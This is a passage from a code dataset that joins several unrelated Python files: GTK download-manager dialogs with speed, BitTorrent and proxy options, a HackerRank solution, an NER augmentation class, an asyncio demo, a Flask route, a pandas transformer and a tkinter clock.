Box(VERTICAL, border_width=5)\n notebook.append_page(vbox, label)\n\n grid = Grid()\n vbox.pack_start(grid, expand=False)\n\n # Speed Limit\n tooltip = _('Upload speed limit, in KiB/s.')\n\n label = RightAlignedLabel(_('Upload Limit:'), tooltip_text=tooltip)\n grid.attach(label, 0, 0)\n\n adjustment = Gtk.Adjustment(lower=0, upper=4096, step_increment=10)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 1, 0)\n self._task_options['max-upload-limit'] = _Option(spin_button, 'value',\n _Option.kib_mapper)\n\n tooltip = _('Download speed limit, in KiB/s.')\n\n label = RightAlignedLabel(_('Download Limit:'), tooltip_text=tooltip)\n grid.attach(label, 2, 0)\n\n adjustment = Gtk.Adjustment(lower=0, upper=4096, step_increment=10)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 3, 0)\n self._task_options['max-download-limit'] = _Option(spin_button, 'value',\n _Option.kib_mapper)\n\n # Retry\n tooltip = _('Number of retries.')\n\n label = RightAlignedLabel(_('Max Retries:'), tooltip_text=tooltip)\n grid.attach(label, 0, 1)\n\n adjustment = Gtk.Adjustment(lower=0, upper=60, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 1, 1)\n self._task_options['max-tries'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n tooltip = _('Time to wait before retries, in seconds.')\n\n label = RightAlignedLabel(_('Retry Interval:'), tooltip_text=tooltip)\n grid.attach(label, 2, 1)\n\n adjustment = Gtk.Adjustment(lower=0, upper=60, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 3, 1)\n self._task_options['retry-wait'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n # Timeout\n tooltip = 
_('Download timeout, in seconds.')\n\n label = RightAlignedLabel(_('Timeout:'), tooltip_text=tooltip)\n grid.attach(label, 0, 2)\n\n adjustment = Gtk.Adjustment(lower=1, upper=300, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 1, 2)\n self._task_options['timeout'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n tooltip = _('Timeout to connect HTTP/FTP/proxy server, in seconds.')\n\n label = RightAlignedLabel(_('Connect Timeout:'), tooltip_text=tooltip)\n grid.attach(label, 2, 2)\n\n adjustment = Gtk.Adjustment(lower=1, upper=300, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 3, 2)\n self._task_options['connect-timeout'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n # Split and Connections\n tooltip = _('Minimal size to split the file into pieces, in MiB.')\n\n label = RightAlignedLabel(_('Split Size:'), tooltip_text=tooltip)\n grid.attach(label, 0, 3)\n\n adjustment = Gtk.Adjustment(lower=1, upper=1024, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 1, 3)\n self._task_options['min-split-size'] = _Option(spin_button, 'value',\n _Option.mib_mapper)\n\n tooltip = _('Max connections per server.')\n label = RightAlignedLabel(_('Per Server Connections:'), tooltip_text=tooltip)\n grid.attach(label, 2, 3)\n\n adjustment = Gtk.Adjustment(lower=1, upper=10, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 3, 3)\n self._task_options['max-connection-per-server'] = _Option(\n spin_button, 'value', _Option.int_mapper)\n\n # Referer\n tooltip = _('The referrer page of the download.')\n label = RightAlignedLabel(_('Referer:'), tooltip_text=tooltip)\n grid.attach(label, 0, 4)\n\n entry = Gtk.Entry(activates_default=True, tooltip_text=tooltip)\n grid.attach(entry, 1, 4, 3, 1)\n self._task_options['referer'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n # Header\n label = RightAlignedLabel(_('HTTP Header:'))\n grid.attach(label, 0, 5)\n\n entry = Gtk.Entry(activates_default=True)\n grid.attach(entry, 1, 5, 3, 1)\n self._task_options['header'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n ## BT Task Page\n label = Gtk.Label(_('BitTorrent'))\n vbox = Box(VERTICAL, border_width=5)\n notebook.append_page(vbox, label)\n\n grid = Grid()\n vbox.pack_start(grid, expand=False)\n\n # Limit\n label = RightAlignedLabel(_('Max open files:'))\n grid.attach(label, 0, 0)\n\n adjustment = Gtk.Adjustment(lower=1, upper=1024, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True)\n grid.attach(spin_button, 1, 0)\n self._task_options['bt-max-open-files'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n label = RightAlignedLabel(_('Max peers:'))\n grid.attach(label, 2, 0)\n\n adjustment = Gtk.Adjustment(lower=1, upper=1024, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True)\n grid.attach(spin_button, 3, 0)\n self._task_options['bt-max-peers'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n # Seed\n tooltip = _('Seed time, in minutes')\n\n label = RightAlignedLabel(_('Seed time:'), tooltip_text=tooltip)\n grid.attach(label, 0, 1)\n\n adjustment = Gtk.Adjustment(lower=0, upper=7200, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, 
numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 1, 1)\n self._task_options['seed-time'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n label = RightAlignedLabel(_('Seed ratio:'))\n grid.attach(label, 2, 1)\n\n adjustment = Gtk.Adjustment(lower=0, upper=20, step_increment=.1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True, digits=1)\n grid.attach(spin_button, 3, 1)\n self._task_options['seed-ratio'] = _Option(spin_button, 'value',\n _Option.float_mapper)\n\n # Timeout\n tooltip = _('Download timeout, in seconds.')\n\n label = RightAlignedLabel(_('Timeout:'), tooltip_text=tooltip)\n grid.attach(label, 0, 2)\n\n adjustment = Gtk.Adjustment(lower=1, upper=300, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 1, 2)\n self._task_options['bt-tracker-timeout'] = _Option(spin_button, 'value',\n _Option.int_mapper)\n\n tooltip = _('Timeout to establish connection to trackers, in seconds.')\n\n label = RightAlignedLabel(_('Connect Timeout:'), tooltip_text=tooltip)\n grid.attach(label, 2, 2)\n\n adjustment = Gtk.Adjustment(lower=1, upper=300, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True,\n tooltip_text=tooltip)\n grid.attach(spin_button, 3, 2)\n self._task_options['bt-tracker-connect-timeout'] = _Option(\n spin_button, 'value', _Option.int_mapper)\n\n tooltip = _('Try to download first and last pieces first.')\n label = RightAlignedLabel(_('Preview Mode:'), tooltip_text=tooltip)\n grid.attach(label, 0, 3)\n switch = Gtk.Switch(tooltip_text=tooltip)\n grid.attach(switch, 1, 3)\n self._task_options['bt-prioritize-piece'] = _Option(\n switch, 'active', _Option.prioritize_mapper)\n\n tooltip = _('Convert downloaded torrent files to BitTorrent tasks.')\n label = RightAlignedLabel(_('Follow Torrent:'), tooltip_text=tooltip)\n grid.attach(label, 2, 3)\n switch = Gtk.Switch(tooltip_text=tooltip)\n grid.attach(switch, 3, 3)\n self._task_options['follow-torrent'] = _Option(switch, 'active',\n _Option.bool_mapper)\n\n # Mirrors\n tooltip = _('For single file torrents, a mirror can be a ' \\\n 'complete URI pointing to the resource or if the mirror ' \\\n 'ends with /, name in torrent file is added. 
For ' \\\n 'multi-file torrents, name and path in torrent are ' \\\n 'added to form a URI for each file.')\n expander = AlignedExpander(_('Mirrors'), expanded=False, tooltip_text=tooltip)\n expander.connect_after('activate', self.update_size)\n grid.attach(expander, 0, 4, 4, 1)\n #vbox.pack_start(expander, expand=False)\n\n uris_view = URIsView()\n uris_view.set_size_request(-1, 70)\n expander.add(uris_view)\n self._task_options['uris'] = _Option(uris_view, 'uris',\n _Option.default_mapper)\n\n ## Metalink Page\n label = Gtk.Label(_('Metalink'))\n vbox = Box(VERTICAL, border_width=5)\n notebook.append_page(vbox, label)\n\n grid = Grid(halign=Gtk.Align.CENTER)\n vbox.pack_start(grid, expand=False)\n\n label = RightAlignedLabel(_('Preferred locations:'))\n grid.attach(label, 0, 0)\n\n entry = Gtk.Entry()\n grid.attach(entry, 1, 0)\n self._task_options['metalink-location'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n label = RightAlignedLabel(_('Language:'))\n grid.attach(label, 0, 1)\n\n entry = Gtk.Entry()\n grid.attach(entry, 1, 1)\n self._task_options['metalink-language'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n label = RightAlignedLabel(_('Version:'))\n grid.attach(label, 0, 2)\n\n entry = Gtk.Entry()\n grid.attach(entry, 1, 2)\n self._task_options['metalink-version'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n label = RightAlignedLabel(_('OS:'))\n grid.attach(label, 0, 3)\n\n entry = Gtk.Entry()\n grid.attach(entry, 1, 3)\n self._task_options['metalink-os'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n tooltip = _('Convert downloaded metalink files to Metalink tasks.')\n\n label = RightAlignedLabel(_('Follow Metalink:'), tooltip_text=tooltip)\n grid.attach(label, 0, 4)\n\n switch = Gtk.Switch(tooltip_text=tooltip)\n grid.attach(switch, 1, 4)\n self._task_options['follow-metalink'] = _Option(switch, 'active',\n _Option.bool_mapper)\n\n ## Miscellaneous Page\n label = Gtk.Label(_('Miscellaneous'))\n vbox = Box(VERTICAL, border_width=5)\n notebook.append_page(vbox, label)\n\n grid = Grid()\n vbox.pack_start(grid, expand=False)\n\n # Overwrite and Rename\n tooltip = _(\"Restart download from scratch if the corresponding\"\n \" control file doesn't exist.\")\n\n label = RightAlignedLabel(_('Allow Overwrite:'), tooltip_text=tooltip)\n grid.attach(label, 0, 0)\n\n switch = Gtk.Switch(tooltip_text=tooltip)\n grid.attach(switch, 1, 0)\n self._task_options['allow-overwrite'] = _Option(switch, 'active',\n _Option.bool_mapper)\n\n tooltip = _('Rename file name if the same file already exists.')\n\n label = RightAlignedLabel(_('Auto Rename Files:'), tooltip_text=tooltip)\n grid.attach(label, 2, 0)\n\n switch = Gtk.Switch(tooltip_text=tooltip)\n grid.attach(switch, 3, 0)\n self._task_options['auto-file-renaming'] = _Option(switch, 'active',\n _Option.bool_mapper)\n\n tooltip = _('Format: [http://][USER:PASSWORD@]HOST[:PORT]')\n label = RightAlignedLabel(_('Proxy:'), tooltip_text=tooltip)\n grid.attach(label, 0, 1)\n\n entry = Gtk.Entry(activates_default=True, tooltip_text=tooltip)\n entry.set_placeholder_text(tooltip)\n grid.attach(entry, 1, 1, 3, 1)\n self._task_options['all-proxy'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n # Authorization\n expander = AlignedExpander(_('Authorization'), expanded=False)\n expander.connect_after('activate', self.update_size)\n vbox.pack_start(expander, expand=False)\n\n grid = Grid()\n expander.add(grid)\n\n label = RightAlignedLabel(_('HTTP User:'))\n grid.attach(label, 0, 0)\n\n entry = 
Gtk.Entry(activates_default=True)\n grid.attach(entry, 1, 0)\n self._task_options['http-user'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n label = RightAlignedLabel(_('Password:'))\n grid.attach(label, 2, 0)\n\n entry = Gtk.Entry(activates_default=True)\n grid.attach(entry, 3, 0)\n self._task_options['http-passwd'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n label = RightAlignedLabel(_('FTP User:'))\n grid.attach(label, 0, 1)\n\n entry = Gtk.Entry(activates_default=True)\n grid.attach(entry, 1, 1)\n self._task_options['ftp-user'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n label = RightAlignedLabel(_('Password:'))\n grid.attach(label, 2, 1)\n\n entry = Gtk.Entry(activates_default=True)\n grid.attach(entry, 3, 1)\n self._task_options['ftp-passwd'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n self.show_all()\n\n @property\n def default_ui(self):\n \"\"\"Get the default UI.\"\"\"\n if self._default_ui is None:\n ui = _TaskNewDefaultUI(self._task_options, self)\n ui.uri_entry.connect('response', self._on_metafile_selected)\n ui.uri_entry.connect('changed', self._on_default_entry_changed)\n self._default_ui = ui\n return self._default_ui\n\n @property\n def normal_ui(self):\n \"\"\"Get the normal UI.\"\"\"\n if self._normal_ui is None:\n ui = _TaskNewNormalUI(self._task_options)\n text_buffer = ui.uris_view.text_buffer\n text_buffer.connect('changed', self._on_normal_uris_view_changed)\n self._normal_ui = ui\n return self._normal_ui\n\n @property\n def bt_ui(self):\n \"\"\"Get the BT UI.\"\"\"\n if self._bt_ui is None:\n self._bt_ui = _TaskNewBTUI(self._task_options)\n return self._bt_ui\n\n @property\n def ml_ui(self):\n \"\"\"Get the ML UI.\"\"\"\n if self._ml_ui is None:\n self._ml_ui = _TaskNewMLUI(self._task_options)\n return self._ml_ui\n\n def _on_advanced_expander_activated(self, expander, buttons):\n \"\"\"When advanced button activated, show or hide advanced buttons.\"\"\"\n for button in buttons:\n if expander.get_expanded():\n button.show()\n else:\n button.hide()\n\n def _on_category_cb_changed(self, category_cb, entry):\n \"\"\"When category combo box changed, update the directory entry.\"\"\"\n iter_ = category_cb.get_active_iter()\n model = category_cb.get_model()\n presentable = model.get_value(iter_, PoolModel.COLUMNS.PRESENTABLE)\n entry.set_text(presentable.directory)\n self.logger.debug('Category is changed to {}.'.format(presentable))\n\n def _on_metafile_selected(self, dialog, response_id):\n \"\"\"When meta file chooser dialog responsed, switch to torrent or metalink\n mode.\"\"\"\n if response_id == Gtk.ResponseType.ACCEPT:\n filename = dialog.get_filename()\n current_filter = dialog.get_filter().get_name()\n if current_filter == _BT_FILTER_NAME:\n self.logger.info(\n 'Torrent file selected, changing to bittorrent UI...')\n self.set_ui(self.bt_ui, {'torrent_filename': filename})\n elif current_filter == _ML_FILTER_NAME:\n self.logger.info(\n 'Metalink file selected, changing to metalink UI...')\n self.set_ui(self.ml_ui, {'metalink_filename': filename})\n else:\n raise RuntimeError('No such filter' + current_filter)\n\n def _on_default_entry_changed(self, entry):\n \"\"\"When the entry in the default content box changed, switch to normal\n mode.\"\"\"\n # When default UI activated, the entry text is cleared, we should\n # ignore this.\n if self._ui is not self.normal_ui:\n self.logger.info('URIs inputed, changing to normal UI...')\n self.set_ui(self.normal_ui, {'uris': entry.get_text()})\n\n def _on_normal_uris_view_changed(self, 
text_buffer):\n        \"\"\"When the uris view in the normal UI is cleared, switch to default mode.\"\"\"\n        if text_buffer.get_property('text') == '':\n            self.logger.info('URIs cleared, changing to default UI...')\n            self.set_ui(self.default_ui, {'uris': ''})\n        elif self._ui is not self.normal_ui:\n            # When it's already the normal UI, and the text of the\n            # URIs view is set (from the browser), the textview will\n            # first be cleared, which changes to the default UI; in\n            # this case we need to set the UI back to the normal UI.\n            self.set_ui(self.normal_ui, {})\n\n    def do_response(self, response_id):\n        \"\"\"Create a new download task if uris are provided.\"\"\"\n        if not self._ui.response(response_id):\n            self.hide()\n\n    def set_ui(self, new_ui, options=None):\n        \"\"\"Set the UI of the dialog.\"\"\"\n        # Remove current child of uris_expander\n        if self._ui is not new_ui:\n            main_vbox = self._main_vbox\n            if self._ui is not None:\n                main_vbox.remove(self._ui.uris_expander)\n            main_vbox.pack_start(new_ui.uris_expander)\n            main_vbox.reorder_child(new_ui.uris_expander, 0)\n\n        if new_ui is self.default_ui:\n            # Hide the advanced buttons when changing to default UI\n            if self.advanced_expander.get_expanded():\n                self.advanced_expander.emit('activate')\n            self.advanced_expander.hide()\n            self.save_expander.hide()\n        else:\n            self.advanced_expander.show_all()\n            self.save_expander.show_all()\n\n        if self._ui is not None:\n            self._ui.deactivate()\n\n        new_ui.activate(options)\n\n        self.update_size()\n\n        self._ui = new_ui\n\n    def update_size(self, widget=None):\n        \"\"\"Update the size of the dialog.\"\"\"\n        content_area = self.get_content_area()\n        size = content_area.get_preferred_size()[0]\n        self.resize(size.width, size.height)\n\n    def run(self, options=None):\n        \"\"\"Popup new task dialog.\"\"\"\n        if options is None:\n            self.set_ui(self.default_ui, {'uris': ''})\n        elif 'torrent_filename' in options:\n            self.set_ui(self.bt_ui, options)\n        elif 'metalink_filename' in options:\n            self.set_ui(self.ml_ui, options)\n        else:\n            self.set_ui(self.normal_ui, options)\n\n        self.logger.info('Running new task dialog...')\n\n        Gtk.Dialog.run(self)\n\nclass PreferencesDialog(Gtk.Dialog, LoggingMixin):\n    \"\"\"Dialog for global preferences.\"\"\"\n    def __init__(self, *args, **kwargs):\n        Gtk.Dialog.__init__(self,\n                            title=_('Preferences'),\n                            buttons=(Gtk.STOCK_CLOSE, Gtk.ResponseType.CLOSE),\n                            *args, **kwargs)\n        LoggingMixin.__init__(self)\n\n        self._preferences = {}\n\n        ### Content Area\n        content_area = self.get_content_area()\n\n        notebook = Gtk.Notebook()\n        content_area.add(notebook)\n\n        ## General Page\n        label = Gtk.Label(_('General'))\n        vbox = Box(VERTICAL, border_width=5)\n        notebook.append_page(vbox, label)\n\n        ## Download Page\n        label = Gtk.Label(_('Download'))\n        vbox = Box(VERTICAL, border_width=5)\n        notebook.append_page(vbox, label)\n\n        grid = Grid()\n        vbox.pack_start(grid, expand=False)\n\n        label = RightAlignedLabel(_('Max Concurrent Tasks:'))\n        grid.attach(label, 0, 0)\n\n        adjustment = Gtk.Adjustment(lower=1, upper=64, step_increment=1)\n        spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True)\n        grid.attach(spin_button, 1, 0)\n        self._preferences['max-concurrent-downloads'] = _Option(\n            spin_button, 'value', _Option.int_mapper)\n\n        label = RightAlignedLabel(_('Global Upload Limit(KiB/s):'))\n        grid.attach(label, 0, 1)\n\n        adjustment = Gtk.Adjustment(lower=0, upper=4096, step_increment=1)\n        spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True)\n        grid.attach(spin_button, 1, 1)\n        self._preferences['max-overall-upload-limit'] = 
_Option(\n            spin_button, 'value', _Option.kib_mapper)\n\n        label = RightAlignedLabel(_('Global Download Limit(KiB/s):'))\n        grid.attach(label, 0, 2)\n\n        adjustment = Gtk.Adjustment(lower=0, upper=4096, step_increment=1)\n        spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True)\n        grid.attach(spin_button, 1, 2)\n        self._preferences['max-overall-download-limit'] = _Option(\n            spin_button, 'value', _Option.kib_mapper)\n\n        self.show_all()\n\n    def run(self, options=None):\n        \"\"\"Popup preferences dialog.\"\"\"\n        self.logger.info('Running preferences dialog...')\n\n        Gtk.Dialog.run(self)\n        self.hide()\n\n","repo_name":"iven/Yaner","sub_path":"yaner/ui/Dialogs.py","file_name":"Dialogs.py","file_ext":"py","file_size_in_byte":38882,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"43"} +{"seq_id":"40555514254","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'breakingRecords' function below.\n#\n# The function is expected to return an INTEGER_ARRAY.\n# The function accepts INTEGER_ARRAY scores as parameter.\n#\n\n\ndef breakingRecords(scores):\n    minScore, maxScore, minCount, maxCount = scores[0], scores[0], 0, 0\n    for score in scores:\n        if score < minScore:\n            minScore = score\n            minCount += 1\n        if score > maxScore:\n            maxScore = score\n            maxCount += 1\n\n    print(f\"[MAX, MIN] = {[maxCount,minCount]}\")\n    return [maxCount, minCount]\n\n\nif __name__ == \"__main__\":\n    fptr = open(\"hackerRank/input.file\", \"r\")\n    num_records = fptr.readline()\n    records = fptr.readline()\n    fptr.close()\n    scores = list(map(int, records.rstrip().split()))\n    records_break = breakingRecords(scores=scores)\n    print(f\"Record Broken: Highest - {records_break[0]} | Lowest - {records_break[1]}\")\n","repo_name":"Gunjan7991/coding_problem_solving","sub_path":"python_solver/hackerRank/Breaking_the_Records.py","file_name":"Breaking_the_Records.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"10874987684","text":"import warnings\nwarnings.filterwarnings(\"ignore\")\nimport pandas as pd\nimport numpy as np\nfrom transformers import CamembertTokenizerFast\n\nimport scripts.utils as utils\n\nclass JsonlDoccano:\n\n    def __init__(self, filepath, camembert=True, shuffle_file_path='scripts/data/labels_augmentation.parquet', labels_augmentation=2, back_translation=False):\n        if camembert:\n            self.TOKENIZER = CamembertTokenizerFast.from_pretrained(\n                'camembert-base',\n                do_lower_case=True, encoding='utf-8').tokenize\n        else:\n            self.TOKENIZER = str.split\n        \n        self.camembert = camembert\n        \n        self.filepath = filepath\n        self.shuffle_file_path = shuffle_file_path\n        self.json_file = utils.read_jsonl(filepath=self.filepath, encoding='utf-8').to_pandas(self.TOKENIZER)\n        self.df = self.to_pandas()\n        self.labels = self.df[self.df['label'] != 'O']\n        self.sentences = self.labels.id_phrase.unique()\n\n        self.labels_augmentation = labels_augmentation\n        self.back_translation = back_translation\n\n    def to_pandas(self):\n        list_df = []\n        for entry in self.json_file:\n            list_df.append(list(entry))\n        df = pd.DataFrame(list_df, columns=['token', 'label', 'id_phrase'])\n        return df\n\n    def run_export(self, resultpath, augmented=False):\n        if augmented:\n            self.df_augmented.to_parquet(resultpath)\n        else:\n            self.df.to_parquet(resultpath)\n        return\n    \n    def shuffle_labels(self, df_shuffle_tokens):\n        \n        json_file = utils.read_jsonl(filepath=self.filepath, 
encoding='utf-8').to_pandas(self.TOKENIZER)\n list_df = []\n remplace = False\n for entry in json_file:\n if entry[2] in self.sentences:\n if remplace and entry[1].startswith('I'):\n continue\n remplace = False\n\n if entry[1].startswith('B'):\n label = entry[1][2:]\n if label in ['Drug', 'Form']:\n line = df_shuffle_tokens[df_shuffle_tokens.label == label].sample(1)\n for element in line['tokens'].to_numpy()[0]:\n list_df.append(np.append(element, entry[2]))\n remplace = True\n continue\n\n list_df.append(list(entry))\n\n shuffled_df = pd.DataFrame(list_df, columns=['token', 'label', 'id_phrase'])\n return shuffled_df\n\n\n @property\n def df_augmented(self):\n shuffled_dfs = [self.df]\n df_shuffle_tokens = pd.read_parquet(self.shuffle_file_path)\n for i in range(self.labels_augmentation):\n shuffled_dfs.append(self.shuffle_labels(df_shuffle_tokens))\n if self.back_translation:\n shuffled_dfs.append(pd.read_parquet('scripts/data/back_translated.parquet'))\n df_augmented = pd.concat(shuffled_dfs)\n return df_augmented\n ","repo_name":"francoisschmerber/Drug_Posology_NLP_Quinten","sub_path":"code/tokens_labels_management/doccano_to_camembert.py","file_name":"doccano_to_camembert.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10403624450","text":"import asyncio\nfrom concurrent.futures import ProcessPoolExecutor\nfrom time import time\n\n\ndef cpu_bound_task(counter):\n init = counter\n while counter > 0:\n counter -= 1\n print(f'Completed cpu_bound_task with: {init}')\n return f'Completed cpu_bound_task with: {init}'\n\n\nasync def send_data():\n while True:\n await asyncio.sleep(1)\n print(f'Send to https://for.me: {time()}')\n\n\nasync def async_worker():\n loop = asyncio.get_running_loop()\n sd = loop.create_task(send_data())\n\n with ProcessPoolExecutor(2) as pool:\n futures = [loop.run_in_executor(pool, cpu_bound_task, num) for num in [60_000_000, 70_000_000, 80_000_000]]\n result = await asyncio.gather(*futures)\n sd.cancel()\n return result\n\n\nasync def main():\n r = await async_worker()\n return r\n\n\nif __name__ == '__main__':\n r = asyncio.run(main())\n print(r)\n","repo_name":"Krabaton/Py9Web","sub_path":"m05_01/08_cpu_bound.py","file_name":"08_cpu_bound.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"43"} +{"seq_id":"11872332168","text":"from flask import request,jsonify,make_response,Blueprint\nfrom ..models.students import Student\nfrom ..extensions.database import db\n\n\n#function to create a student\n\ndef create_student(name,age):\n return Student(name=name,age=age)\n\napi_bp=Blueprint('api',__name__)\n\n@api_bp.route('/hello')\ndef hello():\n return jsonify({\"message\":\"Hello\"})\n\n@api_bp.route('/',methods=['POST'])\ndef create_record():\n data=request.get_json()\n\n name=data.get('name')\n\n age=data.get('age')\n\n create_student(name=name,age=age).save()\n\n return jsonify({\"message\":\"Created\",\n \"student\":{\n \"name\":name,\n \"age\":age\n }\n })","repo_name":"jod35/flask-vanillajs-fullstack-app","sub_path":"main/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"9096999983","text":"#This program is meant to allow the user to enter a non-negative integar and use a loop to calculate the factorial of the loop.\r\n\r\nfrom 
itertools import count\r\n\r\n\r\nuserIntegar = int(input(\"Please enter a positive number: \"))\r\n\r\n#This takes the input from a user and holds it as a constant integer. \r\n\r\ncountNumber = int(1)\r\nholdingSolution = int(1)\r\n\r\n#I declare the integer variables here. countNumber is meant to count upwards till it exceeds the userIntegar number. holdingSolution is meant to multiply against countNumber and hold the solution to the problem. \r\n\r\nwhile countNumber <= userIntegar:\r\n    holdingSolution = holdingSolution * countNumber\r\n    countNumber += 1\r\n\r\n#The goal of this while statement is to determine the factorial of userIntegar. \r\n\r\nprint(\"The factorial of\", userIntegar,\"is\", holdingSolution, \".\")\r\n\r\n#This last print statement outputs the initial number and the factorial solution. \r\n\r\n","repo_name":"Tmmcmasters/SDEV-140-Python-Challenges","sub_path":"M02/McMastersTimothyM02_M02Ex2.py","file_name":"McMastersTimothyM02_M02Ex2.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"2066171201","text":"import pandas as pd\nimport re\n\nclass TransformHeadData():\n    \n    __regExp = \"[a-zA-Z0-9ñÑáéíóúÁÉÍÓÚ\\\s]+[^\\\/\\\s\\\n]+\"\n    \n    def __init__(self, df, subTitlesColumns):\n        self.__df = df\n        self.__subtitlesColumns = subTitlesColumns\n        self.__lengthDF = len(df.columns)\n    \n    def getDF(self):\n        self.__transformHeadData()\n        return self.__df\n    \n    def __transformHeadData(self):\n        for index in range(self.__subtitlesColumns):\n            self.__editHeader(index)\n            self.__addDataTitle(index)\n    \n    def __editHeader(self, column):\n        x = 0\n        while x < self.__lengthDF:\n            if pd.isna(self.__df[x][column]) != True:\n                self.__df[x][column] = re.findall(self.__regExp, self.__df[x][column])[0]\n            x = x + 1\n    \n    def __addDataTitle(self, column):\n        x = 0\n        while x < self.__lengthDF:\n            if pd.isna(self.__df[x][column]) == True and x == 0:\n                x = x + 1\n                continue\n            if pd.isna(self.__df[x][column]) == True:\n                self.__df[x][column] = self.__df[x - 1][column]\n            x = x + 1","repo_name":"RamsesCamacho1171/airflow_prueba","sub_path":"dags/dag_InformacionEstadisticaInvencionesSignosDistintivos/methods/transform/TransformHeadData.py","file_name":"TransformHeadData.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35152541652","text":"import time\nfrom tkinter import *\n\n# Creating UI\nroot = Tk()\n\nroot.title(\"Ashura-Clock\")\n\nroot.geometry(\"600x600\")\n\nroot.config(bg=\"Black\")\n\n# Functions\ndef clock():\n    h = str(time.strftime(\"%H\"))\n    m = str(time.strftime(\"%M\"))\n    s = str(time.strftime(\"%S\"))\n# If statements\n    if int(h) >= 12:\n        label_noon.config(text=\"PM\")\n    else:\n        label_noon.config(text=\"AM\")\n\n    if int(h)>12:\n        h = str((int(h)-12))\n\n\n    label_hr.config(text=h)\n    label_mn.config(text=m)\n    label_sc.config(text=s)\n\n    label_hr.after(200, clock)\n\n\n\n# Label for Hours\nlabel_hr = Label(root, text=\"12\", font=(\"times new roman\",40, \"bold\"), fg=\"white\", bg=\"Green\")\nlabel_hr.place(x=100, y=50, width=80, height=60)\n\nlabel_hr2 = Label(root, text=\"Hours\", font=(\"times new roman\",20, \"bold\"), fg=\"white\", bg=\"Green\")\nlabel_hr2.place(x=100, y=120, width=80, height=40)\n\n# Label for Minutes\nlabel_mn = Label(root, text=\"12\", font=(\"times new roman\",40, \"bold\"), fg=\"white\", bg=\"Green\")\nlabel_mn.place(x=200, y=50, width=80, height=60)\n\nlabel_mn2 = Label(root, text=\"Minute\", 
font=(\"times new roman\",20, \"bold\"), fg=\"white\", bg=\"Green\")\nlabel_mn2.place(x=200, y=120, width=80, height=40)\n\n# Label for Seconds\nlabel_sc = Label(root, text=\"12\", font=(\"times new roman\",40, \"bold\"), fg=\"white\", bg=\"Red\")\nlabel_sc.place(x=300, y=50, width=80, height=60)\n\nlabel_sc2 = Label(root, text=\"Sec\", font=(\"times new roman\",20, \"bold\"), fg=\"white\", bg=\"Red\")\nlabel_sc2.place(x=300, y=120, width=80, height=40)\n\n# Label For AM = PM\nlabel_noon = Label(root, text=\"AM\", font=(\"times new roman\",25, \"bold\"), fg=\"white\", bg=\"Red\")\nlabel_noon.place(x=400, y=50, width=80, height=60)\n\nlabel_noon2 = Label(root, text=\"Noon\", font=(\"times new roman\",20, \"bold\"), fg=\"white\", bg=\"Red\")\nlabel_noon2.place(x=400, y=120, width=80, height=40)\n\n# calling the function in 